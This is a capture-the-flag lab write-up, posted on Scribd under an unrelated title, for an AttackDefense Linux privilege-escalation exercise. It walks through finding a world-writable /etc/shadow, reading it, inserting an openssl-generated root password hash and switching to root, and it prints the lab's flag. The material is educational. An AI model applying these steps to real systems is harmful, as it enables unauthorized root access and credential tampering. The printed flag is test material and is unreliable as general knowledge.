Scribd
Upload
10 views5 pages

How To Become e Incident Responder

Uploaded by

moweb97781
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
10 views5 pages

How To Become e Incident Responder

Uploaded by

moweb97781
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Name Permissions Matter!

URL https://www.attackdefense.com/challengedetails?cid=75

Type Privilege Escalation : Linux

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic.

As mentioned in the challenge statement, the permissions of some files are not set properly
which can lead to problems. Search for such files and start from looking for world writable files.
A world writable file is the one for which every user has write permission/access.

Step 1: ​The following command will look for files (and not symlinks etc) which is world writable.

Command:​ find / -not -type l -perm -o+w


Step 2: ​Observe from the result that /etc/shadow is world writable. Verify the same and also
check its contents.

Commands:
ls -l /etc/shadow
cat /etc/shadow
Step 3: ​Observe that root password is not set. By adding a known password in shadow file, one
can escalate to root. Use openssl to generate a password entry.

Command:​ openssl passwd -1 -salt abc password

Step 4: ​Copy the generate entry and add it to root record in /etc/shadow

Command: ​vim /etc/shadow

Step 5: ​After making the changes, try to switch to root user.

Command:​ su

Enter password : password


Step 6: ​Once the escalation to root is complete, retrieve the flag located in /root directory.

Commands:
cd /root
ls -l
cat flag

Flag:​ e62ab67ddff744d60cbb6232feaefc4d

You might also like